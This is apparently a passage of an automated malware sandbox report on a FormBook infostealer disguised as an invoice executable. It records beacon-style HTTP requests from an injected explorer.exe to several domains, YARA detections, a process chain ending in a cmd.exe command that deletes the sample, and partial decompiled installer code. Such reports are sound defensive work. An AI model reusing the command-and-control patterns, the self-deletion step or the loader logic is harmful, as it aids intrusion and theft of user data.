3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 Data Ascii: 15D<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>404200B Not Found</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CC
Jun 10, 2021 14:37:05.531508923 CEST	4669	IN	Data Raw: 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 Data Ascii: CCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000;
Jun 10, 2021 14:37:05.531562090 CEST	4671	IN	Data Raw: 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 Data Ascii: g: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left;
Jun 10, 2021 14:37:05.531598091 CEST	4672	IN	Data Raw: 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 73 65 72 Data Ascii: ading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0; margin:
Jun 10, 2021 14:37:05.531635046 CEST	4673	IN	Data Raw: 65 76 4e 6e 62 55 33 56 46 66 54 45 4c 2f 57 33 33 70 66 48 33 31 63 47 59 42 70 67 57 39 4c 62 61 33 49 63 38 43 38 69 41 37 37 4e 4c 65 35 31 34 76 75 38 42 50 6a 36 2f 6e 33 6c 43 64 2f 56 6b 67 4b 58 47 6b 77 59 55 51 48 41 61 4d 2b 79 51 75 Data Ascii: evNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+I
Jun 10, 2021 14:37:05.531672001 CEST	4675	IN	Data Raw: 54 78 75 6f 32 34 6b 57 4d 72 51 48 67 2f 6e 5a 7a 78 44 71 6d 71 46 52 46 43 37 39 39 2b 64 62 45 69 72 4d 6f 56 45 58 68 56 41 30 37 59 2b 47 57 4e 4d 4f 42 43 78 49 49 70 43 67 43 70 41 58 35 4b 67 48 42 36 49 51 49 4c 48 77 45 33 48 58 6b 32 Data Ascii: Txuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT/uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEf
Jun 10, 2021 14:37:05.531708002 CEST	4676	IN	Data Raw: 34 67 36 54 2b 41 6b 41 54 38 34 62 73 30 66 58 32 77 65 53 38 38 58 37 58 36 68 58 52 44 44 52 7a 64 77 48 5a 2f 35 44 32 68 6a 6a 67 68 74 33 4d 62 35 79 31 4e 49 4e 71 2b 62 65 5a 42 75 38 64 38 34 36 35 37 77 50 59 66 4e 38 70 5a 42 63 30 67 Data Ascii: 4g6T+AkAT84bs0fX2weS88X7X6hXRDDRzdwHZ/5D2hjjght3Mb5y1NINq+beZBu8d84657wPYfN8pZBc0g+JKiKYiNr9r4v1Zrvdbtazp16TSCOfZppMiGD6iVqr271oVokU6AJ9U5FGnXIww5mH+kLEhxI1cl20QCGCTgRMA/3+F2lRXXtzXhURPTTt9GQA6h+d/1dE5An9GRH5o5mwIgKHvhCBi5j60Bci8oe+EKEPrYmg+QN
Jun 10, 2021 14:37:05.531745911 CEST	4677	IN	Data Raw: 4a 75 6e 2d 32 30 32 31 20 30 38 3a 33 37 3a 30 35 20 45 44 54 22 3e 20 57 65 62 4d 61 73 74 65 72 3c 2f 61 3e 2e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 Data Ascii: Jun-2021 08:37:05 EDT"> WebMaster</a>. </section> <p class="reason-text">The server cannot find the requested page:</p> </div> <section class="additional-info"> <div class="container">
Jun 10, 2021 14:37:05.531773090 CEST	4678	IN	Data Raw: 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: /body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.4	49760	23.227.38.74	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 10, 2021 14:37:10.715167999 CEST	4680	OUT	GET /dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=/zMHFgDZZhoYLr+uNA/LZaIwAqqHNoUyccNHiXKU1Oc8waRhqa0xV5lesUE3sQ0wja+H HTTP/1.1 Host: www.28ji.site Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 10, 2021 14:37:10.805521011 CEST	4681	IN	HTTP/1.1 403 Forbidden Date: Thu, 10 Jun 2021 12:37:10 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Sorting-Hat-PodId: 160 X-Sorting-Hat-ShopId: 47463563425 X-Dc: gcp-europe-west1 X-Request-ID: 9f2c5d5b-dde7-4da0-8843-84d5dbd26aac X-Permitted-Cross-Domain-Policies: none X-XSS-Protection: 1; mode=block X-Download-Options: noopen X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC cf-request-id: 0a97863fde00000742bdb5b000000001 Server: cloudflare CF-RAY: 65d2a6462ab00742-FRA alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400 Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0
Jun 10, 2021 14:37:10.805551052 CEST	4683	IN	Data Raw: 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b Data Ascii: ;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6r
Jun 10, 2021 14:37:10.805566072 CEST	4684	IN	Data Raw: c3 aa 20 6e c3 a3 6f 20 74 65 6d 20 70 65 72 6d 69 73 73 c3 a3 6f 20 70 61 72 61 20 61 63 65 73 73 61 72 20 65 73 74 65 20 73 69 74 65 22 0a 20 20 7d 2c 0a 20 20 22 65 73 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 41 63 63 65 73 6f Data Ascii: no tem permisso para acessar este site" }, "es": { "title": "Acceso denegado", "content-title": "No tienes permiso para acceder a esta pgina web" }, "ko": { "title": " ", "content-title": "
Jun 10, 2021 14:37:10.805583000 CEST	4685	IN	Data Raw: 0a 20 20 7d 2c 0a 20 20 22 68 69 22 3a 20 7b 0a 20 20 20 20 22 74 69 74 6c 65 22 3a 20 22 e0 a4 aa e0 a4 b9 e0 a5 81 e0 a4 82 e0 a4 9a 20 e0 a4 85 e0 a4 b8 e0 a5 8d e0 a4 b5 e0 a5 80 e0 a4 95 e0 a5 83 e0 a4 a4 22 2c 0a 20 20 20 20 22 63 6f 6e 74 Data Ascii: }, "hi": { "title": " ", "content-title": " "
Jun 10, 2021 14:37:10.805597067 CEST	4686	IN	Data Raw: 74 72 79 20 63 6f 64 65 0a 20 20 74 72 61 6e 73 6c 61 74 69 6f 6e 73 20 3d 20 74 5b 6c 61 6e 67 75 61 67 65 5d 20 7c 7c 20 74 5b 22 65 6e 22 5d 3b 0a 20 20 2f 2f 20 52 65 70 6c 61 63 65 20 63 6f 6e 74 65 6e 74 20 6f 6e 20 73 63 72 65 65 6e 0a 20 Data Ascii: try code translations = t[language] \|\| t["en"]; // Replace content on screen for (var id in translations) { target = document.querySelector("[data-i18n=" + id + "]"); if (target != undefined) { target.innerHTML = translatio
Jun 10, 2021 14:37:10.805612087 CEST	4686	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.4	49763	69.162.102.218	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 10, 2021 14:37:17.004250050 CEST	4705	OUT	GET /dp3a/?GR-d=+9xVWhQ3YZdKS9LSdJD9Q5IGOGjZWYGRUC/PBrhb5+8EiR866LajmsNw/hU5zOKELtJS&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1 Host: www.kingguardgroup.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 10, 2021 14:37:17.173516035 CEST	4706	IN	HTTP/1.1 404 Not Found Date: Thu, 10 Jun 2021 12:37:17 GMT Server: Apache Content-Length: 315 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.4	49764	35.205.61.67	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 10, 2021 14:37:27.645236969 CEST	4707	OUT	GET /dp3a/?GR-d=ayCA4X1Kl09ymHiLnx81tYxQpS3YxUUFxhK9zdH9kq/gCaIMsyBIYQcEhhLQSA14VAsf&nPTdU=-ZoHnNt0frfd2Hn HTTP/1.1 Host: www.rebeccannemontgomery.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 10, 2021 14:37:27.931746006 CEST	4708	IN	HTTP/1.1 302 Moved Temporarily Server: nginx Date: Thu, 10 Jun 2021 12:37:27 GMT Content-Type: text/html Connection: close Set-Cookie: btst=946a4907f7d43076dd648d064a34f63b\|84.17.52.18\|1623328647\|1623328647\|0\|1\|0; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT Location: 1

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.4	49765	37.48.65.148	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jun 10, 2021 14:37:33.101150036 CEST	4709	OUT	GET /dp3a/?nPTdU=-ZoHnNt0frfd2Hn&GR-d=qfgFr8ieK4pb0oEJahXrwfByJwdYjuIB81dpFpRA2DwOSKuw2QjIPW4nYRzvvZDFGDPJ HTTP/1.1 Host: www.pecon.pro Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jun 10, 2021 14:37:33.930744886 CEST	4709	IN	HTTP/1.1 302 Found cache-control: max-age=0, private, must-revalidate connection: close content-length: 11 date: Thu, 10 Jun 2021 12:37:32 GMT location: http://survey-smiles.com server: nginx set-cookie: sid=a0bf6c34-c9e8-11eb-8de8-c4010263fd46; path=/; domain=.pecon.pro; expires=Tue, 28 Jun 2089 15:51:40 GMT; max-age=2147483647; HttpOnly Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 Data Ascii: Redirecting

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Proforma Invoice and Bank swift-REG.PI-0086547654.exe PID: 6952 Parent PID: 5948

General

Start time:	14:35:28
Start date:	10/06/2021
Path:	C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe'
Imagebase:	0x400000
File size:	223620 bytes
MD5 hash:	B148AE414EB8A1B34A15CDB32C21F9EE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.655317494.00000000024D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: Proforma Invoice and Bank swift-REG.PI-0086547654.exe PID: 7028 Parent PID: 6952

General

Start time:	14:35:29
Start date:	10/06/2021
Path:	C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe'
Imagebase:	0x400000
File size:	223620 bytes
MD5 hash:	B148AE414EB8A1B34A15CDB32C21F9EE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.652838419.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.704410667.00000000008C0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.704410667.00000000008C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.704410667.00000000008C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.704014446.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.704436953.00000000008F0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.704436953.00000000008F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.704436953.00000000008F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 3424 Parent PID: 7028

General

Start time:	14:35:35
Start date:	10/06/2021
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:
Imagebase:	0x7ff6fee60000
File size:	3933184 bytes
MD5 hash:	AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: raserver.exe PID: 5888 Parent PID: 3424

General

Start time:	14:35:53
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\raserver.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\raserver.exe
Imagebase:	0xae0000
File size:	108544 bytes
MD5 hash:	2AADF65E395BFBD0D9B71D7279C8B5EC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.914114145.0000000003000000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.914114145.0000000003000000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.914114145.0000000003000000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.914091207.0000000002FD0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.914091207.0000000002FD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.914091207.0000000002FD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.913473779.0000000000AB0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6764 Parent PID: 5888

General

Start time:	14:35:57
Start date:	10/06/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c del 'C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe'
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: conhost.exe PID: 6776 Parent PID: 6764

General

Start time:	14:35:58
Start date:	10/06/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff724c50000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: Proforma Invoice and Bank swift-REG.PI-0086547654.exe PID: 6952 Parent PID: 5948 Proforma Invoice and Bank swift-REG.PI-0086547654.exeCOMMON

Execution Graph

Execution Coverage:	12.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.8%
Total number of Nodes:	1492
Total number of Limit Nodes:	31

Executed Functions

Function 0040323C, Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			_entry_() {
				struct _SHFILEINFOA _v360;
				struct _SECURITY_ATTRIBUTES* _v376;
				char _v380;
				CHAR* _v384;
				char _v396;
				int _v400;
				int _v404;
				CHAR* _v408;
				intOrPtr _v412;
				int _v416;
				intOrPtr _v420;
				struct _SECURITY_ATTRIBUTES* _v424;
				void* _v432;
				int _t34;
				CHAR* _t39;
				char* _t42;
				signed int _t44;
				void* _t48;
				intOrPtr _t50;
				signed int _t52;
				signed int _t55;
				int _t56;
				signed int _t60;
				void* _t79;
				void* _t89;
				void* _t91;
				char* _t96;
				signed int _t97;
				void* _t98;
				signed int _t99;
				signed int _t100;
				signed int _t103;
				CHAR* _t105;
				signed int _t106;
				char _t120;

				_v376 = 0;
				_v384 = "Error writing temporary file. Make sure your temp folder is valid.";
				_t99 = 0;
				_v380 = 0x20;
				__imp__#17();
				_t34 = SetErrorMode(0x8001); // executed
				__imp__OleInitialize(0); // executed
				 *0x423f58 = _t34;
				 *0x423ea4 = E00405E88(8);
				SHGetFileInfoA(0x41f458, 0,  &_v360, 0x160, 0); // executed
				E00405B66(0x4236a0, "NSIS Error");
				_t39 = GetCommandLineA();
				_t96 = "\"C:\\Users\\jones\\Desktop\\Proforma Invoice and Bank swift-REG.PI-0086547654.exe\" ";
				E00405B66(_t96, _t39);
				 *0x423ea0 = GetModuleHandleA(0);
				_t42 = _t96;
				if("\"C:\\Users\\jones\\Desktop\\Proforma Invoice and Bank swift-REG.PI-0086547654.exe\" " == 0x22) {
					_v404 = 0x22;
					_t42 =  &M00429001;
				}
				_t44 = CharNextA(E00405684(_t42, _v404));
				_v404 = _t44;
				while(1) {
					_t91 =  *_t44;
					_t109 = _t91;
					if(_t91 == 0) {
						break;
					}
					__eflags = _t91 - 0x20;
					if(_t91 != 0x20) {
						L5:
						__eflags =  *_t44 - 0x22;
						_v404 = 0x20;
						if( *_t44 == 0x22) {
							_t44 = _t44 + 1;
							__eflags = _t44;
							_v404 = 0x22;
						}
						__eflags =  *_t44 - 0x2f;
						if( *_t44 != 0x2f) {
							L15:
							_t44 = E00405684(_t44, _v404);
							__eflags =  *_t44 - 0x22;
							if(__eflags == 0) {
								_t44 = _t44 + 1;
								__eflags = _t44;
							}
							continue;
						} else {
							_t44 = _t44 + 1;
							__eflags =  *_t44 - 0x53;
							if( *_t44 == 0x53) {
								__eflags = ( *(_t44 + 1) | 0x00000020) - 0x20;
